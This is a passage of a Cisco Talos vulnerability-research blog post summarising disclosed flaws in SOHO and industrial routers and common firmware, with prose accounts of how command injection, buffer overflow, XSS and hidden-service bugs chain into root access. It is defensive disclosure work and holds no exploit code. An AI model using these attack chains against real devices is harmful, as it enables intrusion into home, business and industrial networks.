DATABASE RESOURCES PRICING ABOUT US

{"id": "TALOSBLOG:F12D609E385BA1FCE69CBF1839C98B04", "vendorId": null, "type": "talosblog", "bulletinFamily": "blog", "title": "The many vulnerabilities Talos discovered in SOHO and industrial wireless routers post-VPNFilter", "description": "* Since [the discovery of the widespread VPNFilter malware in 2018](<https://blog.talosintelligence.com/vpnfilter/>), Cisco Talos researchers have been researching vulnerabilities in small and home office (SOHO) and industrial routers.\n * During that research, Talos has worked with vendors to report and mitigate these vulnerabilities, totaling 141 advisories covering 289 CVEs across multiple routers.\n * Talos is highlighting some of the major issues our researchers discovered over the past several years, including vulnerabilities that an attacker could mostly directly access or those an adversary could chain together to gain elevated access to the devices.\n * There are several Snort rules that can detect possible exploitation of the vulnerabilities included in this post.\n\n\nSmall office/home office (SOHO) routers and small-scale industrial routers are fairly common targets for bad actors because these devices are nearly in every home and small business. Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance. However, they are also often deployed without a sophisticated security team in place to mitigate vulnerabilities. These routers are usually connected to the internet directly and all local network traffic passes through these devices. \n\nIn 2018, Talos uncovered and published an article about the [VPNFilter malware](<https://blog.talosintelligence.com/vpnfilter/>) aimed at SOHO network equipment. This malware had the ability to completely compromise or wipe a targeted device. Since then, numerous reports of sophisticated actors targeting SOHO routers have come to light: Talos recently released a blog post [discussing our concern by an increase in state-sponsored campaigns targeting network infrastructure](<https://blog.talosintelligence.com/state-sponsored-campaigns-target-global-network-infrastructure/>). Microsoft discussed state-sponsored[ actors using SOHO routers](<https://www.microsoft.com/en-us/security/blog/2022/11/10/microsoft-threat-intelligence-presented-at-cyberwarcon-2022/>) to obfuscate their operations at CyberWarCon 2022. While Lumen recently highlighted that [criminal actors are also targeting SOHO routers](<https://blog.lumen.com/routers-from-the-underground-exposing-avrecon/>) to support their operations\n\nThe Talos Vulnerability Discovery and Research Team -- our world-class team of researchers who work with third-party vendors to disclose and patch vulnerabilities in a variety of software and hardware -- made SOHO and industrial routers a major priority after VPNFilter. By helping vendors mitigate the vulnerabilities on these devices, we make life harder for malicious actors. \n\nSince VPNFilter, Talos has investigated 13 SOHO and industrial routers from various vendors. As a direct result of this research, Talos has reported 289 CVEs to vendors, published across 141 Talos reports. These reports resulted in appropriate [Snort network intrusion detection coverage](<https://snort.org/advisories>) and several security fixes from each vendor. These fixes help customers who deploy Cisco Secure solutions and improve the security posture of anyone using these devices once the vulnerabilities are patched.\n\nIn this blog post, we provide a summary of the vulnerabilities we discovered in these devices, specifically focusing on vulnerabilities adversaries were most likely to exploit, or ones that could be chained together to gain an elevated level of access to the device or network. This is by no means the end of our research into SOHO or industrial routers. We plan to continue investigating these types of devices to better protect our customers and the community as a whole. \n\n# Routers\n\n## **ASUS RT-AX82-U**\n\nResearch conducted by Lilith Wyatt.\n\n### Background\n\nOur researchers chose to examine the ASUS RT-AX82-U because it is a very popular router and it shares a codebase with a plethora of other ASUS routers. Over the course of the research, Talos submitted three unique reports to ASUS, resulting in three CVEs. The ASUS RT-AX82-U contains a large amount of open-source code in the form of the asus-merlin-ng firmware. During this research, this section of code was avoided in favor of device- and feature-specific codebases within the device, including smart home integrations and the AiMesh functionality. The smart home integration features are designed for integration with Amazon Alexa or the &quot;If This, Then That&quot; (IFTTT) automation framework to provide more easily accessible functionality or automation. The AiMesh feature is a mesh networking solution designed to allow for multiple routers to work together to provide Wi-Fi connectivity over a larger area from a single network connection point. These features are enabled by default in the stock configuration of the device. This means that, without explicit effort by a user to disable these features, all ASUS RT-AX82-U devices could be targets.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1586**: This vulnerability existed in the smart home integration features of the router. If a user ever generates a token to use with IFTTT, an authentication token is generated to allow functionality to be leveraged on the router. This token can be easily brute-forced, as there are only 255 possible combinations, and the validity is measured based on when the token was generated and the device&#x27;s uptime. This means if the router is rebooted, this vulnerability is exploitable up until the time (in seconds from reboot) the token was originally created, instead of the intended two-minute timeout. Leveraging this vulnerability allows an attacker to gain administrative privileges on the router as if they were properly authenticated. \n\n * **TALOS-2022-1590**: This vulnerability existed in the AiMesh functionality of the router. By utilizing pre-authentication control messages, an improperly sized read can be used to leak information that can be decrypted locally based on known plaintext. This is possible because the provided length of a user-supplied AES key, which needs to be a set size based on the AES variant used (in this case AES-256), is not checked. By providing a key smaller than the required size, extra information can be returned to the user. \n\n * **TALOS-2022-1592**: This vulnerability existed in the AiMesh functionality of the router. By utilizing pre-authentication diagnostic messages, an improperly sized packet can lead to a denial of service. This is possible due to the lack of length validation on packets ingested, which leads to an integer underflow. This integer underflow is then utilized in a read loop that ends in accessing unmapped memory, causing a crash.\n\n### Observations\n\nThe primary issue in the Asus RT-AX82-U came from the inclusion of services that do not necessarily need to be activated by default. The smart home integration service should be disabled by default, as it is by no means required for the operation of the router and likely is not utilized in most scenarios. The AiMesh service could be disabled by default and only enabled if a user wants to utilize a mesh network. While disabling this functionality would not have removed the vulnerabilities from the device, it would significantly reduce the attack surface as well as reduce the number of deployments that had devices in vulnerable states.\n\n## **D-Link DIR-3040**\n\nResearch conducted by Dave McDaniel.\n\n### Background\n\nThe D-Link DIR-3040 is another popular device and was an interesting subject for our researchers because of the mesh communications used between nodes to provide improved Wi-Fi coverage wherever the device is deployed. Over the course of the research, Talos submitted six unique reports to D-Link, resulting in six CVEs. The research targeting the D-Link DIR-3040 focused on all aspects of the device in a stock configuration of the device. This included the web services -- including hidden diagnostic services -- and Wi-Fi mesh networking implementation, as well as other general security issues. The Wi-Fi mesh networking implementation allows for multiple routers to connect together to provide increased network coverage.\n\n### Notable Vulnerabilities\n\n * **TALOS-2021-1284**: This vulnerability was a combination of web server functionality and an issue within hidden functionality. By visiting a hidden URL of the router, an attacker could activate a hidden telnet console used for diagnostics. Within this diagnostics menu, multiple commands within the restricted shell lacked proper input sanitization and, as such, allowed arbitrary command injection. \n\n * **TALOS-2021-1361**: Talos discovered this vulnerability within the Wi-Fi mesh networking service enabled by default on the device. By utilizing hard-coded credentials, an attacker could connect to the MQTT server. Once connected, an attacker could query information about the mesh. This information was encrypted but could be decrypted utilizing the MAC address of the base router, which was found in the same message. Once decrypted, the root password for the primary router could be recovered. \n\n * **TALOS-2021-1281**: Talos discovered this vulnerability within the Zebra network management service which was enabled by default on the router. By utilizing hard-coded credentials for this service, an attacker could access diagnostic tooling for the router. An adversary could change the service login banner to a file to leak sensitive information otherwise inaccessible via this service.\n\n### Observations\n\nThe DIR-3040 web server contains hidden paths to access debugging functionality on the device. There is no reason to hide this functionality, and it is better off as an explicit option that a user has to manually enable. Hard-coded credentials should also never be included in modern devices. Finally, as with the RT-AX82-U, the MQTT server related to mesh communication should not be enabled unless a feature that requires the MQTT server is enabled by a user during setup or other configuration.\n\n## **InHand Network InRouter 302**\n\nResearch conducted by Francesco Benvenuto.\n\n### Background\n\nOur researchers examined the InHand Network InRouter 302 because three ATM providers claimed to have used this device: Wireless ATM STORE.COM, Wincor Nixdorf and UnionPay. Over the course of the research, [Talos submitted 23 unique reports to InHand](<https://blog.talosintelligence.com/vulnerability-spotlight-inhand-router-302-oct-2022/>), resulting in 25 CVEs. The research targeting the InHand Network InRouter 302 focused on all aspects of the device in a stock configuration of the device. This included the web server, API services and general security issues. The web server contained multiple vulnerabilities, including cross-site scripting and common gateway interface (CGI) issues. The console utilities of InRouter also contained numerous vulnerabilities. During the course of this research, an interesting unescape vulnerability was identified that spanned numerous open-source projects and closed-source products. This vulnerability will be discussed more in-depth in the Siretta router section.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1469**: This vulnerability existed in the HTTP server. It exploits the _`/info.jsp`_ endpoint, which is normally only used by web pages themselves. The endpoint will effectively _**`eval` **_the parameter sent as a Javascript command. Because the endpoint is not limited in access, this leads to a cross-site scripting (XSS) vulnerability.\n * ******TALOS-2022-1472**: ****This vulnerability existed in the HTTP server. Because of improper access control, a low-privileged user could update the router configuration, enabling them to change to privileged user credentials, resulting in privilege escalation.\n * **TALOS-2022-1476**: The vulnerability existed within the restricted console presented to a user when using SSH or Telnet. This console contained multiple commands, including `_factory_`, a command that only the most-privileged user could execute. By utilizing this command, an attacker could use this (presumed) debug functionality to overflow the stack buffer used to hold the user data while it was being parsed. This vulnerability could lead to arbitrary code execution.\n\n### Observations\n\nThese three vulnerabilities would allow an attacker to obtain root access to the device starting with a single click. TALOS-2022-1469 is an XSS vulnerability that could allow an attacker to exfiltrate the session cookie of a logged-in user. If the session cookie belonged to a low-privileged user, an attacker could chain TALOS-2022-1472 to update the router&#x27;s configuration, enabling them to change privileged user credentials, resulting in privilege escalation. An attacker, at this point, would have the most elevated permitted credentials, but no root access. However, by exploiting TALOS-2022-1476, an attacker would be able to obtain, through a stack-based buffer overflow, remote command execution. \n\nWe wrote [an extensive blog post](<https://blog.talosintelligence.com/vuln-spotlight-in-hand-networks/>) that discusses, in-depth, how an attacker could chain the vulnerabilities discovered to obtain remote command execution in the InHand Network InRouter 302 with a one-click attack.\n\n## **Linksys E Series**\n\nResearch conducted by a researcher within Cisco Talos.\n\n### Background\n\nThe Linksys E Series devices were directly affected by the VPNFilter campaign. The E1200 and E2500 are two SOHO routers offered by various vendors over the years, most recently Linksys. The devices target low-budget installations, providing four Ethernet ports for additional device connections. The E Series provides a web-based management console to allow owners to make administrative changes to the system configuration. This web console also provided the main attack surface during our analysis of the device.\n\n### Notable Vulnerability\n\n * **TALOS-2018-0625**: This disclosure contains three related authenticated command injection vulnerabilities, all accessible via the web-based management portal. Many of the configuration details passed to E Series routers during configuration must be retained across a device&#x27;s power cycle. Since the device has only one writable directory (/tmp) and that directory is cleared on reboot, the device uses NVRAM to store configuration details. Three paths exist where one of two parameters, `machine_name` or `wan_domain`, are retrieved from NVRAM and subsequently used directly in a command passed to `system()`. \n\n## **Milesight UR32L and MilesightVPN**\n\nResearch conducted by Francesco Benvenuto.\n\n### Background\n\nThe Milesight UR32L is an industrial router that offers a good tradeoff between price and functionalities. The vendor also provides software for a remote access solution called MilesightVPN which, theoretically, allows the UR32L to be less exposed, thus making it more difficult for an attacker to target it. Over the course of the UR32L research, Talos submitted 17 unique reports to Milesight, [resulting in 63 CVEs](<https://blog.talosintelligence.com/talos-discovers-17-vulnerabilities-in-milesight/>). Talos researchers also sent Milesight five unique reports for the VPN solution, resulting in six CVEs. This research focused mainly on two components: its HTTP server with its related components and the router console shell. Our analysis also considered the attack scenario in which the user is using Milesight&#x27;s MilesightVPN, so as to investigate a more complete attack scenario.\n\n### Notable Vulnerabilities\n\n * **TALOS-2023-1701**: This vulnerability existed in the HTTP server login functionality of the MilesightVPN. This is an SQL injection vulnerability that would allow an attacker to bypass the web login and grant access to the administrative web pages. This in turn allows an attacker to communicate with routers connected to the VPN.\n * **TALOS-2023-1697**: This vulnerability existed in the HTTP server login functionality of the UR32L. This is the most severe vulnerability found on the router. Indeed, it is a pre-authentication remote stack-based buffer overflow. An unauthenticated attacker able to communicate with the HTTP server would be able to perform remote command execution. One way to communicate with the HTTP server remotely is by using TALOS-2023-1701.\n * **TALOS-2023-1706**: The UR32L offers different diagnostic functionalities within its HTTP server, like ping and trace. Both of these vulnerabilities have an OS command injection vulnerability through the specified host. An attacker with low-privilege credentials in the UR32L could exploit these vulnerabilities and execute remote commands.\n\n### Observations\n\nThe vendor provides MilesightVPN software, a remote access solution. The underlying idea is that by using this software, Milesight&#x27;s UR32L would not need to be exposed to the internet, thus reducing the attack surface and making it more difficult for an attacker to target it. During our research, we took into consideration this scenario and demonstrated that unfortunately, [an attacker can use TALOS-2023-1701](<https://blog.talosintelligence.com/talos-discovers-17-vulnerabilities-in-milesight/>) to attack the remote access solution software and then execute arbitrary code inside the UR32L by using TALOS-2023-1697.\n\n## **Netgear Orbi Router RBR750/RBS750**\n\nResearch conducted by Dave McDaniel.\n\n### Background\n\nThe Netgear Orbi RBR750/RBS750 was chosen due to its popularity and reputation of quality. This device is widely adopted as a high-end SOHO router choice and also utilizes a mesh network to connect satellites. Over the course of the research, Talos submitted four unique reports to Netgear, resulting in four CVEs. This research of the Netgear Orbi Router RBR750 focused on multiple services across the devices, such as the management web server and services provided by the device on the local network. The network services included hidden functionality that could be activated using a special network packet. The Orbi utilizes the open-source OpenWrt ubus code base for communication between the satellites and primary router, but also includes hidden additional functionality on top of this library.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1595**: This vulnerability is based on the existence of an undocumented service listening on UDP port 23. This service listened for an encrypted packet containing the MAC address, username and password of the _br-lan_ interface of the device. The encryption used was a modified blowfish algorithm similar to those used for the Nintendo DS handheld video game system&#x27;s cartridge copyright protection. Once the packet was retrieved, a telnet daemon was spawned which allowed direct access to the underlying busybox system.\n * **TALOS-2022-1596**: This vulnerability existed in the web-based administration of the Orbi. Within the web interface, there was functionality to block specific devices specified by MAC address and device name. The device name field of the associated POST request is vulnerable to command injection due to a lack of user-input sanitization. An attacker could craft a malicious packet to execute arbitrary commands on the device with root privileges.\n * **TALOS-2022-1592**: This vulnerability existed in the Wi-Fi mesh communication service of the device. This service utilized the open-source library, developed by OpenWrt, ubus. More specifically, this vulnerability was due to functionality Netgear built on top of the ubus library. If an attacker had knowledge of the web interface password or the default password, it would be possible to send a ubus message to activate a hidden telnet service. This hidden telnet functionality could then be used by an attacker to obtain direct access to the underlying busybox system.\n\n### Observations\n\nThe Netgear Orbi mainly suffered from a lack of user input sanitization and the presence of hidden services. User input should be sanitized server-side using well-tested libraries instead of one-off solutions, or worse, client-side solutions. Providing a telnet service is not inherently bad, but hiding the activation from a user does not seem to provide value. Including hidden ways of activating the telnet server makes it more difficult for a user to know how to minimize their risk.\n\n## **Robustel R1510**\n\nResearch conducted by Francesco Benvenuto.\n\n### Background\n\nThe Robustel R1510 was chosen due to the physical danger vulnerabilities could present. This router is used in physical systems such as elevators, and Robustel partners with many wide-reaching industrial control system vendors such as Vodafone, Bosch, Siemens, Emerson and Schneider Electric. Over the course of the research, Talos submitted 10 unique reports to Robustel, resulting in 26 CVEs. Research on the Robustel R1510 was primarily focused on the web server, which manages almost all functionality of the device.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1577**: This vulnerability was contained within the web server and the functionality directly associated with installing a NodeJS application. While uploading a new NodeJS application, a global variable is set with the provided filename as part of the POST request. Once the file is uploaded to the web server, a second request is required to install the application. Using this request, it was possible for an attacker to trigger a command injection by crafting a maliciously named file. Once the application was installed, the command injection would be triggered. This allowed an attacker to execute arbitrary commands on the device. \n\n * **TALOS-2022-1576**: Talos discovered this vulnerability within the firmware upgrade functionality found within the web server. The R1510 utilized a modified U-Boot header but maintained the presence of the character array used for the firmware name. This field was not validated or escaped before being used directly in the function call _system_. An attacker could use this to craft a firmware update file that would result in arbitrary command injection during the update process. \n\n * **TALOS-2022-1578**: Talos discovered this vulnerability within the SSH-authorized key uploading feature within the web management interface of the R1510. An authenticated user could change their Linux username on the device. This created a directory path for the SSH keys used in certificate-based authentication. When a user uploaded a new SSH key, their username was used directly, without any validation, to build a directory path that was passed into a `_sysprintf_` function call, which would result in a command injection. An attacker could leverage a vulnerability to bypass authentication in the web interface, then continue to leverage this vulnerability to execute arbitrary commands within Linux.\n\n### Observations\n\nMost of the discovered vulnerabilities in the Robustel R1510 were related to a lack of user input sanitization. Ideally, a common code base would be used for many instances of checks across the device. If there was no specific performance requirement, these checks would occur multiple times throughout the process of uploading files and utilizing previously uploaded files. Using a common library to perform these checks would negate the risk of validation falling out of sync with checks elsewhere in the system.\n\n## **Sierra Wireless Airlink**\n\nResearch conducted by Carl Hurd.\n\n### Background\n\nTalos researchers chose to investigate the Sierra Wireless Airlink because of its deployment flexibility. The AirLink is intended for use in remote locations utilizing a cellular connection for local devices. The AirLink is managed out-of-band from the network provided by the device. Talos submitted 11 unique reports to Sierra Wireless, resulting in 13 CVEs. The research was focused on all aspects of the device, including the web server, custom console binary, SNMP and other exposed services on the device. If an attacker were to compromise this device, it would be possible to leverage the functionality of the device to manipulate traffic on all sides of the network.\n\n### Notable Vulnerabilities\n\n * **TALOS-2018-0751**: This vulnerability is contained within the web server ACEManager, which lacked a cross-site request forgery prevention header. These headers allow the server to check that requests are coming from a similar session in a coherent manner, instead of coming from a link of an unrelated browser capitalizing on a pre-authenticated session. This vulnerability allows for the possibility of session hijacking using various methods. \n\n * **TALOS-2018-0750**: This vulnerability existed in the ping_result.cgi binary, which did not properly filter input before reflecting it back to the client. This improper filtering allowed JavaScript to be injected into the response to the client. This could be used to run code on the client&#x27;s browser, such as making requests on behalf of the user or disclosing confidential tokens. Using this vulnerability in addition to TALOS-2018-0751 allowed for complete session hijacking of an authenticated user. \n\n * **TALOS-2018-0748**: Talos discovered this vulnerability within the file upload capability of templates within the AirLink 450. When uploading template files, a user can specify the name of the file being uploaded. There were no restrictions to protect the files currently on the device and used for normal operation. If a file was uploaded with the same name as a file that already existed in the directory, it inherits the permissions of that file. In this case, multiple CGI files could be overwritten with execute permissions. After replacing the file, an adversary could navigate to the newly uploaded CGI binary, and the code would be executed. By leveraging TALOS-2018-0751 and TALOS-2018-0750, the adversary could hijack an authenticated session of a user after uploading malicious code and executing it on command. This would result in fully unauthenticated remote code execution.\n\n### Observations\n\nMost of the findings on the Airlink 450 centered around the web server and the basic functionality it provides. The lack of CSRF tokens provided by the web server and the reflected XSS vulnerability allows authenticated requests to be made by hijacking a user&#x27;s session. A well-developed and tested web server should include CSRF automatically. The XSS can be mitigated by utilizing JavaScript libraries, or sanitization libraries if using CGI binaries, to sanitize user input properly. Finally, file upload functionality should be strictly limited to a folder that only contains user-uploaded files, to avoid permissions issues or file overwrites that could be used maliciously.\n\n## **Siretta QUARTZ-GOLD**\n\nResearch conducted by Francesco Benvenuto.\n\n### Background\n\nThe Siretta QUARTZ-GOLD was included in this research because the device is often deployed near critical devices, giving vulnerabilities an increased level of urgency. The device has a 4G/LTE failover mechanism for network uptime, which likely means the router is deployed on critical networks. Over the course of the research, Talos submitted[ 14 unique reports to Siretta, resulting in 62 CVEs](<https://blog.talosintelligence.com/vulnerability-spotlight-os-command-injection-directory-traversal-and-other-vulnerabilities-found-in-siretta-quartz-gold-and-freshtomato/>). The research of the Siretta QUARTZ-GOLD explored all aspects of the router that were accessible by default. This included the HTTP server, SNMP server implementation, and various command line interface (CLI) tools. The majority of the router firmware is a fork of FreshTomato, which is an open-source router firmware. By utilizing this firmware, the QUARTZ-GOLD inherits a code reuse vulnerability from the project, just as many other projects that utilize the open-source codebase.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1638:** This vulnerability existed in the M2M feature of the QUARTZ-GOLD. When the M2M feature was enabled, the m2m binary was executed. This binary offered rich functionality through a custom UDP protocol, including a function called &quot;DELETE_FILE&quot;, which would allow execution of the `_rm -rf <base_folder>/<M2M_data_entry.data> &_` command through the `system`_ _function. The _`M2M_data_entry.data`_ portion of the command was specified in the UDP packet without any parsing or sanitization on the _`M2M_data_entry.data`_ string. This functionality was vulnerable to command injection. Furthermore, the `DELETE_FILE` functionality did not require authentication. An unauthenticated attacker could use this vulnerability to achieve arbitrary command execution.\n * **TALOS-2022-1615**: This vulnerability existed in the SNMP functionality of the router. The QUARTZ-GOLD implemented a feature that allowed for custom OIDs to be defined within the router. An attacker could submit a custom OID that would be executed whenever that OID was queried. The simplest solution was to execute commands directly as the root user in the Linux shell. An adversary could leverage this vulnerability to achieve arbitrary command injection.\n * **TALOS-2022-1610**: Talos discovered this vulnerability within the web server functionality of the QUARTZ-GOLD. By basing the firmware of this device off of the FreshTomato firmware, many default features were inherited from the FreshTomato firmware that was not documented as part of the device functionality. More specifically, debug functionality was not disabled in FreshTomato and allowed a user authenticated to the web interface to issue direct Linux commands as if they had a shell. An authenticated attacker could use this vulnerability to achieve arbitrary command injection.\n\n### Observations\n\nThe Siretta QUARTZ-GOLD inherited many of the discovered vulnerabilities from the third-party code base included in the product. FreshTomato includes many features that are prebuilt but could have been disabled if the manufacturer were more familiar with the code they were building from. Much of the debugging functionality provided by FreshTomato is undocumented in the Siretta device and seems unintentionally included. When reusing large code bases, it is important to know what exactly is being included in that code base, and how it can be properly configured for the use-case the developer has in mind.\n\n## **Synology SRM - RT2600ac**\n\nResearch conducted by Claudio Bozzato.\n\n### Background\n\nThe Synology RT2600ac is a high-end SOHO router that runs on Synology SRM (Synology Router Manager), a Linux-based operating system for all Synology routers. Talos researchers chose to look at this product because of its popularity and reputation for quality. We submitted nine reports to Synology, of which two affect their VPN service (QuickConnect), and one affects a Qualcomm tool used in SRM, eventually leading to the disclosure of 10 CVEs. QuickConnect is Synology&#x27;s VPN service, which allows for managing routers remotely without requiring the configuration of the router to expose its management port and without having to manage DDNS services to locate the router remotely.\n\nThis research has been detailed in a dedicated [blog post](<https://blog.talosintelligence.com/vulnerability-spotlight-multiple-63063210e63ef5e7e1ec312c/>), which explains how Talos managed to chain some of the reported vulnerabilities to achieve remote code execution without prior authentication in SRM devices via Synology&#x27;s VPN services, which are publicly accessible.\n\n### Notable Vulnerabilities\n\n * **TALOS-2020-1064**: When routers connect to the QuickConnect VPN, they are placed in a dedicated subnet. This report demonstrates that the subnets are, however, not logically split, so it is possible to change the assigned netmask to a larger one, allowing one to talk with any other router connected to the same VPN. The VPNs are accessible by routers upon registration against QuickConnect. But after initial registration, the router is not needed anymore, and the attack can be performed independently of the device. There are several VPNs available that are easily enumerable and seem to be geo-located. \n\n * **TALOS-2020-1066**: This report describes a vulnerability in iptables&#x27; rules within the router. SRM defines filtering rules to prevent access only on selected ports from LAN. However, those rules are missing for connections that come from the QuickConnect VPN. This means that any service listening on the device is remotely accessible from the VPN. This can be used together with TALOS-2020-1064 to have unrestricted communication with any network service running in a chosen device from those reachable in the VPN. \n\n * **TALOS-2020-1065** \\- This report describes a vulnerability in Qualcomm&#x27;s `_lbd_`_,_ a service reachable via LAN on ports 7786 and 7787, which can be used without authentication to directly execute shell commands as root, whenever an attacker is on the same LAN as the router. Since this is reachable via LAN, it is also reachable via the VPN. By chaining this vulnerability with the two above, it was possible to execute arbitrary commands as root via the VPN, without prior authentication, on any selected router connected to QuickConnect.\n\n### Observations\n\nSynology SRM provides a convenient VPN service to solve the remote management issue for SOHO routers running on a dynamic IP address. However, this research has shown that such services can also widen the attack surface. Devices exposed via DDNS normally take more effort to be discovered, usually requiring an internet-wide scan. With QuickConnect, however, all devices are easily discovered as they&#x27;re all connected to the same VPN, which is publicly accessible and whose geo-located services are easily enumerable.\n\n## **TCL Linkhub Mesh Wifi**\n\nResearch conducted by Carl Hurd.\n\n### Background\n\nThe TCL Linkhub is one of the newest products sold by TCL and the feature set and price tag could mean a very rapid adoption rate, much like the budget TV market. Over the course of the research, Talos submitted 17 unique reports to TCL, resulting in 42 CVEs. The research on the TCL Linkhub Mesh Wi-Fi system was primarily focused on the API service that is used for all management of the device. The Linkhub does not use a web server to serve a user interface, instead, all interaction with the device is done through a phone application. This phone application interacts with the device through a ProtoBuffer-based API. This service is one of the few ports open by default and thus was the most interesting target for this research.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1463**: This vulnerability existed in the code for getting and setting values in a flash of the LinkHub. This vulnerability is interesting because it was not contained in a specific library and was used in almost every binary on the device. While getting values from a flash, the function did not take into account the length of the destination buffer. An attacker could easily change a configuration value to a large value, and the next time that variable was loaded from flash, it would cause a buffer overflow. This vulnerability would lead to arbitrary code execution.\n * **TALOS-2022-1455**: This vulnerability existed in the API service that is exposed for use with the phone application. ProtoBuffer serialization is used for all communication with the device from the management application. Once the buffer is deserialized, it is dispatched to various handlers across the device. Within the `_set_mf_rule_` functionality, a `memcpy` occurs that determines length based on user input directly. Attackers could use this functionality to send a `mf_rule` message that contains fields larger than the statically sized buffers in the device. This vulnerability would lead to a buffer overflow and arbitrary code execution.\n * **TALOS-2022-1458**: This vulnerability existed in the API service that is exposed for use with the phone application. ProtoBuffer serialization is used for all communication with the device from the management application. Once the buffer is deserialized, it&#x27;s dispatched to various handlers across the device. Within the `ucloud_add_node` functionality, which is used to add satellites to the router mesh, a `MxpManageList` message is parsed directly into the `system` function. An attacker could use a malicious message to execute arbitrary commands using this vulnerability.\n\n### Observations\n\nThe TCL LinkHub has a unique approach to management, which changes the attack surface significantly. Choosing to utilize Protobuffers for serialization is a good decision on the developer&#x27;s part, as it is a well-tested and maintained library, but once the data is unserialized, much of the input is blindly trusted since it is assumed to come from the management application. All of this data should be treated as user data and more validation should occur once deserialization occurs, prior to use in potentially dangerous functions, such as `memcpy`.\n\n## **TP-Link TL-R600VPN**\n\nResearch conducted by Jared Rittle and Carl Hurd.\n\n### Background\n\nThe TP-Link TL-R600VPN became a subject of our research for its direct involvement in the VPNFilter campaign. The TP-Link TL-R600VPN is a five-port SOHO router. This device contains a Realtek RTL8198 integrated system on a chip. This particular chip uses an offshoot of the MIPS-1 architecture developed by Lexra. This device is a fairly run-of-the-mill small router and contains network diagnostic capabilities and basic router functionality that is managed by a web server on the device. This research led to four Talos reports to TP-Link, resulting in four CVEs. For a more in-depth look at the research done on this device, refer to the corresponding [blog post](<https://blog.talosintelligence.com/vulnerability-deep-dive-tp-link/>).\n\n### Notable Vulnerabilities\n\n * **TALOS-2018-0620**: This vulnerability existed in the header parsing of HTTP requests within the web server. This vulnerability was triggered by sending a request to a specific subset of pages on the web server. Once the request was made, a statically sized buffer is used for the parsed headers. An attacker could use an abnormally long header entry to overflow the buffer and overwrite the return address. This vulnerability leads to arbitrary code execution.\n * **TALOS-2018-0619**: This vulnerability existed in the network debugging functionality of the device. The ping functionality of the R600-VPN contained a parameter that was unchecked by user input. An attacker could supply an abnormally long ping_addr parameter to overflow the statically sized buffer used to hold the value, in turn overwriting the return address. This vulnerability leads to arbitrary code execution.\n * **TALOS-2018-0618** \\- This vulnerability was contained within the HTTP server within the R600-VPN. The user-provided URL was parsed without regard for special characters such as &quot;../&quot; to navigate up a directory tree. Normally, special characters like this are removed or ignored in a URL and the directory navigation does not occur, but in the R600-VPN this navigation could be used to retrieve any files on the device. This vulnerability leads to sensitive information disclosure.\n\n### Observations\n\nMost of the findings on the TL-R600VPN centered around the web server and the functionality provided by it. One of the simplest solutions to reduce risk is to integrate a well-tested web server instead of developing one from scratch or including untested code in the product. While some of the vulnerable code was within the web server itself, much of it was also added by the manufacturer for simple additional features, like network diagnostics. It is clear from this research that any added code needs to be reviewed to prevent these issues.\n\n## **ZTE MF971R**\n\nResearch conducted by Marcin Noga.\n\n### Background\n\nThe ZTE MF971R mobile router is one of the newest devices in the ZTE MF mobile routers family. At least in Poland, it is a very popular device and its popularity is due to the fact that it&#x27;s being sold among others by major GSM providers or even added as a gift to some of their products/services. Over the course of the research, Talos submitted seven reports to ZTE, resulting in seven CVEs. The research on the ZTE MF971R router was primarily focused on the web application/server that is used for all management of the device. We have managed to find a set of vulnerabilities in Web APIs which chained together allowed us to create a one-click exploit, giving us full remote access to the device. See our [deep dive whitepaper](<https://talosintelligence.com/resources/407>) for a more in-depth explanation.\n\n### Notable Vulnerabilities\n\n * ******TALOS-2021-1317:** ****This vulnerability is related to the implementation of CSRF protection/API restriction communication in Web APIs. To communicate with a certain set of Web APIs, a request should be sent from a 127.0.0.1 address or default router IP address -- 192.168.0.1. It&#x27;s verified by checking the HTTP Referer value. Unfortunately, the way the check was implemented gives an attacker the possibility to bypass it by simply adding string 127.0.0.1 in any part of a referrer URL and obtaining full access to API communication.\n * ******TALOS-2021-1320:** ****Talos discovered this vulnerability within the implementation of the ADB_MODE_SWITCH Web API. A password parameter being a part of this API is not properly sanitized in the context of its length which leads to a stack-based buffer overflow. The victim does not need to be logged in to be affected by this vulnerability. The only constraint an attacker needs to pass is a referrer check, which is easy to bypass and has been described in TALOS-2021-1317. This remote pre-auth stack-based buffer overflow gives an attacker full control when overwriting the return address and as we demonstrated can be turned into one-click remote code execution.\n\n### Observations\n\nThe ZTE MF971R&#x27;s security suffered for several reasons. Despite visible efforts to reduce access to certain WebAPIs, it was still possible to bypass this mechanism, thus increasing the number of attack vectors. The main web server binary lacked compatibility with basic mitigations such as ASLR (Address Space Layout Randomization) and stack cookies, making the exploitation of existing vulnerabilities trivial. Improving security mechanisms in the aforementioned areas will reduce the number of attack vectors and make exploiting existing vulnerabilities, especially those without any authorization, more difficult or practically impossible.\n\n# Common frameworks\n\nThe previous section talked about the specific routers that we investigated. However, some of these routers also ran specific software that is common for many routers: open-source firmware such as OpenWrt, FreshTomato, AsusWRT or DD-WRT. One router also ran a specific kernel module called KCodes. As this software isn&#x27;t specific to the vendors we discussed in the router sections, we&#x27;re grouping the vulnerabilities we found together.\n\n## **OpenWrt**\n\nResearch conducted by Claudio Bozzato.\n\n### Background\n\nOpenWrt is a Linux-based OS, primarily used on embedded devices to route network traffic. It&#x27;s highly customizable and ships with a set of tools and libraries that have been optimized to run on hardware with limited resources. Due to this, OpenWrt is a common choice among SOHO routers.\n\n### Notable Vulnerabilities\n\n * **TALOS-2019-0893**: This vulnerability affected the ustream-ssl library, a library that works as an SSL wrapper for OpenSSL, mbed TLS and wolfSSL. This issue describes how the library does not terminate the SSL connection immediately when a wrong certificate is supplied by an HTTPS server, allowing the client to send one request using any unverified certificate, before terminating the connection. As OpenWrt uses this library for tools like `wget`, any functionality relying on it would be affected by this information leak when requesting any HTTPS URL, which could allow, in the worst case, for an attacker to perform a man-in-the-middle attack and steal any sensitive information present in the request.\n\n### Observations\n\nBecause the HTTPS connection eventually terminates with an error, this issue can easily go unnoticed. As OpenWrt is a platform that is easy to customize and write scripts for, such a vulnerability may affect a large number of users.\n\n## **FreshTomato**\n\nResearch conducted by Francesco Benvenuto.\n\n### Background\n\nThe FreshTomato is a popular open-source firmware project. It is an actively maintained and modern firmware project that&#x27;s widely used by multiple SOHO routers. By default, it ships with several functionalities, e.g., SSH, VPN capabilities, Telnet, 